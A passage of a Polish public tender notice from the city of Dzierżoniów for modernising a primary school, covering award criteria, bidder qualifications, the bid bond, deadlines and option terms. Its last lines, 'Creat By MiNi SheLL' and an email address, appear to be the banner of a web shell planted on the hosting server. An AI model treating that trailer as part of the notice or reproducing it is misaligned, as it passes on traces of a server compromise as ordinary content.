umowy o woli skorzystania z prawa opcji i jego zakresie w formie pisemnej, na co najmniej 7 dni przed planowanym terminem wdrożenia prawa opcji;<br/>2) Wykonawca jest zobowiązany do wykonania każdej z przekazanych do realizacji prac<br/>w terminie wskazanym w Harmonogramie i na warunkach określonych w umowie<br/> i w cenie wynikającej z oferty Wykonawcy.<br/><br/>W przypadku skorzystania przez Zamawiającego z prawa opcji (część objęta prawem opcji) rozliczenie robót objętych opcją będzie prowadzone za pomocą odrębnych faktur, nie związanych z zakresem zamówienia podstawowego (część gwarantowana).<br/>Postanowienia umowy odnoszące się do przedmiotu umowy objętego zamówieniem<br/>podstawowym (część gwarantowana) znajdują odpowiednie zastosowanie w odniesieniu do przedmiotu umowy objętego prawem opcji (część objęta prawem opcji).<br/>Zamawiający złoży Wykonawcy oświadczenie woli o skorzystania z prawa opcji (część <br/>objęta prawem opcji ) w sytuacji, gdy będzie posiadał odpowiednie środki finansowe na sfinansowanie zamówienia objętego prawem opcji (część objęta prawem opcji).<br/>Nieskorzystanie przez Zamawiającego z opcji nie wymaga podania przyczyn i nie stanowi podstawy jego odpowiedzialności z tytułu niewykonania lub nienależytego wykonania umowy. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">15 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień na podstawie art. 214 ust. 1 pkt 7 ustawy Pzp polegających na wykonaniu robót budowlanych w zakresie wykonania instalacji wod. – kan., elektrycznych, c.o., układania gładzi, robót tynkarskich, malowania pomieszczeń, wymiany posadzek wraz z podłożem, wykonania osłon nagrzewnic zamontowanych w sali gimnastycznej o łącznej wartości do 100 000 zł netto. Warunki na jakich zostanie udzielone zamówienie będą odpowiadały warunkom niniejszego postępowania określonym w projektowanych postanowieniach umowy i jego załącznikach oraz w SWZ w szczególności w zakresie zasad płatności i kar umownych. Zamówienia polegające na powtórzeniu podobnych rodzajowo zamówień o których mowa wyżej zostaną udzielone w przypadku, gdy zaistnieje uzasadniona potrzeba rozszerzenia zamówienia podstawowego i zostaną zapewnione środki finansowe na ten cel.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta Wykonawcy, który spełni wszystkie postawione w SWZ warunki, nie podlega wykluczeniu z postępowania, złoży ofertę niepodlegającą odrzuceniu oraz uzyska łącznie największą liczbę punktów stanowiących sumę punktów przyznanych w ramach każdego z podanych kryteriów. Łączna ilość punktów uzyskanych przez ofertę zostanie obliczona według wzoru:<br/>K = KC + KG + KK + KO<br/>K – łączna ilość punktów uzyskana przez ofertę, <br/>KC – punkty uzyskane w kryterium „cena brutto”, <br/>KG – punkty uzyskane w kryterium „przedłużenie okresu gwarancji”,<br/>KK - punkty uzyskane w kryterium „doświadczenie kierownika budowy w specjalności konstrukcyjno-budowlanej”, <br/>KO – punkty uzyskane w kryterium „zatrudnienie osób wymienionych w katalogu określonym w art. 96 ust. 2 pkt 2 ustawy Pzp”.<br/>Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku. Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów spośród ofert nie podlegających odrzuceniu. Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kierownika budowy w specjalności konstrukcyjno-budowlanej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie osób wymienionych w katalogu określonym w art. 96 ust. 2 pkt 2 ustawy Pzp</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający określa następujące warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej:<br/>a) w zakresie doświadczenia:<br/>wykonał należycie w okresie ostatnich 5 lat przed upływem terminu składania ofert,a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie- co najmniej dwie roboty budowlane w zakresie modernizacji lub/i remontu lub/i przebudowy budynku o powierzchni użytkowej minimum 1400 m2 .<br/>b) w zakresie kwalifikacji zawodowych:<br/>skieruje do realizacji zamówienia następujące osoby, umożliwiające realizację zamówienia na odpowiednim poziomie jakości tj. w zakresie nadzoru nad realizacją robót budowlanych osoby posiadające uprawienia do kierowania robotami<br/>budowlanymi:<br/>- jedną osobę posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej,<br/>- jedną osobę posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,<br/>- jedną osobę posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych.<br/> Przez uprawnienia do pełnienia samodzielnych funkcji w budownictwie zamawiający rozumie uprawnienia wydane na podstawie aktualnie obowiązującej ustawy – Prawo budowlane lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów albo odpowiednie kwalifikacje uzyskane za granicą, uznane w Polsce na podstawie przepisów o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej. <br/>Zmiana ww. osoby może nastąpić tylko wtedy gdy Wykonawca wykaże inne osoby legitymujące się co najmniej równoważnymi kwalifikacjami, o których mowa w SWZ, wymagana jest również akceptacja Zamawiającego.<br/>Uwaga! W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/> warunek określony w lit. a) musi być spełniony w całości przez co najmniej jednego z Wykonawców wspólnie ubiegających się o daną część zamówienia (jeden lub każdy z podmiotów musi posiadać samodzielnie wymagane doświadczenie),<br/> warunek określony w lit. b) zostanie spełniony jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o zamówienie potwierdzi, iż spełnia ww. warunek albo Wykonawcy łącznie wykażą dysponowanie osobą. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy<br/>brak podstaw do wykluczenia z postępowania na podstawie przesłanek<br/>określonych w art. 108 ust. 1 ustawy Pzp (wzór stanowi załącznik nr 2 do SWZ). Zgodnie z art. 274 ust.<br/>1 ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego<br/>oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnego na dzień<br/>złożenia,następującego podmiotowego środka dowodowego: Potwierdzenie aktualności informacji zawartych w oświadczeniu, o<br/>którym mowa w rozdziale IV ust. 1 pkt. 1.2 SWZ w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego - załącznik nr 8 do<br/>SWZ; (dokument ten składa każdy z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia/podmiot udostępniający zasoby).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie<br/>z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została<br/>najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących<br/>podmiotowych środków dowodowych:<br/>1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty. Wzór wykazu robót budowlanych stanowi załącznik nr 6 do SWZ.<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych wspólnie z innymi Wykonawcami,<br/>wykaz, o którym mowa powyżej dotyczy robót budowlanych, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył;<br/>2) wykaz z osobami, skierowanymi przez Wykonawcę do realizacji zamówienia publicznego, odpowiedzialnymi za kierowanie<br/>robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia<br/>niezbędnego do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami. Wzór wykazu z osobami skierowanymi do realizacji zamówienia stanowi załącznik nr 7<br/>do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz Ofertowy stanowi załącznik nr 1 do SWZ. Wykonawca zobowiązany jest do wypełnienia Formularza<br/>Ofertowego na Platformie (informacje zawarte w SWZ) oraz opatrzenie go kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym przez osoby umocowane.2. Aktualne na dzień złożenia<br/>oświadczenia o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu (stanowi załącznik nr 2 do<br/>SWZ) w zakresie wskazanym w SWZ – każdy osobno spośród Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia (dotyczy również wspólników spółki cywilnej) i podmiot trzeci, na którego potencjał powołuje się Wykonawca<br/>celem potwierdzenia spełnienia warunków udziału w postępowaniu. Oferta oraz oświadczenie o<br/>niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu muszą być<br/>złożone w oryginale. To samo dotyczy oświadczenia Wykonawcy o tym, że zachodzą wobec niego podstawy wykluczenia z<br/>postępowania na podstawie art. 108 ust. 1 pkt. 1, 2 ,5 ustawy Pzp.<br/>3. Gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych,<br/>Wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa<br/>obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy / należy złożyć<br/>dokument potwierdzający, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania - odpis lub<br/>informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru-Wykonawca nie jest zobowiązany do złożenia ww. dokumentów , jeżeli Zamawiający może je uzyskać<br/>za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych<br/>dokumentów. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia Wykonawcy<br/>zobowiązani są do ustanowienia pełnomocnika.<br/>Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak<br/>składana jest oferta (tj. w formie elektronicznej opatrzonej kwalifikowanym podpisem<br/>elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem<br/>osobistym). Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa<br/>sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia<br/>sporządzonego stosownie do art. 97 par 2 ustawy z dnia 14 lutego 1991 r. – Prawo o notariacie, które to poświadczenie<br/>notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa<br/>sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym<br/>mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego. 4. Oświadczenie<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia stanowi załącznik nr 5 do SWZ. 5. Zobowiązanie<br/>podmiotu trzeciego stanowi załącznik nr 4 do SWZ (o ile dotyczy). 6. W przypadku gdy Wykonawca powierza wykonanie<br/>części zamówienia podwykonawcy, zobowiązany jest do wykazania w załączniku nr 3 do SWZ informacji o części<br/>zamówienia, której wykonanie zamierza powierzyć podwykonawcom oraz podania nazw ich firm, o ile są już znane. 7.<br/>Zastrzeżenie tajemnicy przedsiębiorstwa – W przypadku informacji objętych tajemnicą przedsiębiorstwa Wykonawca<br/>powinien w momencie ich przekazania wyraźnie oznaczyć, które informacje stanowią tajemnicę przedsiębiorstwa oraz nie<br/>powinny być udostępniane. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający żąda od Wykonawców wniesienia wadium w kwocie 40 000,00 zł (słownie: czterdzieści tysięcy złotych zero groszy).<br/>1.1. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp. Bieg terminu ważności wadium rozpoczyna się wraz z upływem terminu składania ofert.<br/>2. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>• pieniądzu,<br/>• gwarancjach bankowych,<br/>• gwarancjach ubezpieczeniowych,<br/>• poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>2.1. Oznaczenie beneficjenta składanych gwarancji wadialnych:<br/>Gmina Miejska Dzierżoniów, Rynek 1, 58-200 Dzierżoniów<br/>NIP: 882-10-00-34, REGON: 890717830.<br/>2.2. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Gminy Miejskiej Dzierżoniów, prowadzony przez Bank Spółdzielczy w Dzierżoniowie o numerze 50 9527 0007 0046 7773 2000 0005 z adnotacją: Wadium w postępowaniu pn. Wykonanie robót budowlanych obejmujących modernizację pomieszczeń Szkoły Podstawowej nr 9 przy ul. Kopernika 7, w ramach zadania pn.: „Modernizacja Szkoły Podstawowej nr 9 <br/>w Dzierżoniowie” , numer ref. ZI-1.271.32.2025, a dokument potwierdzający wniesienie wadium (dokonanie przelewu) zaleca się załączyć do oferty. Wadium uważa się za wniesione, jeżeli kwota wadium znajdzie się na rachunku bankowym Zamawiającego przed terminem składania ofert. Zamawiający dopuszcza przedłożenie potwierdzenia wykonania przelewu wygenerowanego z systemu bankowości elektronicznej (bez stempla banku) jako potwierdzenie wniesienia wadium w pieniądzu (przelewem na rachunek Zamawiającego).<br/>Szczegóły znajdują się w SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> a) Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia<br/>umowy w sprawie przedmiotowego zamówienia publicznego; b) Wszelka korespondencja<br/>będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem; c) Do oferty należy<br/>załączyć pełnomocnictwo dla ustanowionego pełnomocnika; d) Wykonawcy składają jedną<br/>ofertę, do której załączone będą dokumenty, o których mowa w SWZ; e) Wykonawca winien<br/>przedłożyć dokumenty i oświadczenia wymienione w rozdziale IV SWZ dotyczące każdego<br/>partnera konsorcjum osobno w zakresie tam wskazanym ; f) Oświadczenia i dokumenty<br/>wspólne, takie jak np.: oferta cenowa, składa pełnomocnik Wykonawców w imieniu wszystkich;<br/>g) Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich<br/>Wykonawców występujących wspólnie; h) wszyscy partnerzy będą ponosić odpowiedzialność<br/>solidarną za wykonanie umowy zgodnie z jej postanowieniami; i) Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców,<br/>którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane. Wtedy<br/>powinni dołączyć do oferty oświadczenie (załącznik nr 5 do SWZ), z którego wynika, które roboty<br/>budowlane wykonują poszczególni Wykonawcy, j) przed podpisaniem umowy Wykonawcy<br/>składający ofertę wspólną będą mieli obowiązek przedstawić Zamawiającemu umowę<br/>konsorcjum. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza możliwość zmiany umowy zawartej z Wykonawcą. Wszystkie<br/>dopuszczalne zmiany postanowień umowy oraz określenie rodzaju, zakresu i warunków zmian<br/>zawarte są w § 19 wzoru umowy (stanowiącym załącznik nr 10 do SWZ) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Za pośrednictwem Platformy Zakupowej: https://dzierzoniow.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-27 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-25</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawcy oraz innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia oraz poniósł lub może ponieść<br/>szkodę w wyniku naruszenia przez Zamawiającego przepisów ustawy Pzp, przysługują środki ochrony prawnej określone w<br/>dziale IX ustawy Pzp. Zamawiający wykluczy wykonawcę w<br/>przypadku zaistnienia okoliczności przewidzianych postanowieniami art. 7 ust. 1<br/>ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę<br/>oraz służących ochronie bezpieczeństwa narodowego. Wymagania jakościowe odnoszące się do co najmniej głównych elementów składających się na przedmiot zamówienia, o których mowa w art. 246 ust. 2 ustawy Pzp zostały określone w opisie przedmiotu zamówienia, czyli w dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru robót. Dokumenty te wskazują parametry wszystkich materiałów i urządzeń, które będą musiały być użyte do realizacji przedmiotu zamówienia, jak również zasady wiedzy technicznej wymagane do wykonania robót. Dokumenty opisujące przedmiot zamówienia są tak precyzyjne, że bez względu na fakt, kto będzie wykonawcą przedmiotu zamówienia, jedyną różnicą będą zaoferowane ceny. W związku z czym Zamawiający jest upoważniony do zastosowania jako kryterium oceny ofert ceny 70%. Termin wykonania zamówienia. <br/>1. Wykonawca zobowiązuje się wykonać przedmiot zamówienia w terminie 15 miesięcy od dnia przekazania terenu budowy, z tym że: <br/>1) modernizację kuchni wraz z zapleczem socjalno-sanitarnym i montażem i uruchomieniem urządzeń technologicznych kuchni oraz uzyskaniem od Państwowego Powiatowego Inspektora Sanitarnego opinii dopuszczającej kuchnię do użytkowania, w terminie do 30.11.2025 r. <br/>2) przebudowę instalacji wodociągowej w terminie do 31.08.2025 r. <br/>3) demontaż instalacji gazowej w budynku głównym do 30.11.2025 r.<br/>4) wykonanie robót budowlanych (część objęta prawem opcji) w zakresie:<br/>a) modernizacji sali gimnastycznej wraz z zapleczem socjalno-sanitarnym;<br/>b) modernizacji małej sali gimnastycznej;<br/>c) modernizacji korytarza przy sali gimnastycznej,	<br/>w terminie do 21.11.2025 r. Termin ten może ulec zmianie w przypadku otrzymania dofinansowania przez Zamawiającego i wdrożenia zamówienia objętego prawem opcji tj. wprowadzenia aneksu do umowy po 30.06.2025 r., wówczas termin wykonania robót zostanie wydłużony o czas jaki minął od dnia 30.06.2025 r. do czasu zawarcia aneksu na wykonanie zamówienia objętego prawem opcji.<br/>2. Zamawiający zachowuje prawo do wdrożenia zamówienia objętego prawem opcji (część objęta prawem opcji) w terminie nie później niż do 6 miesięcy od dnia zawarcia umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com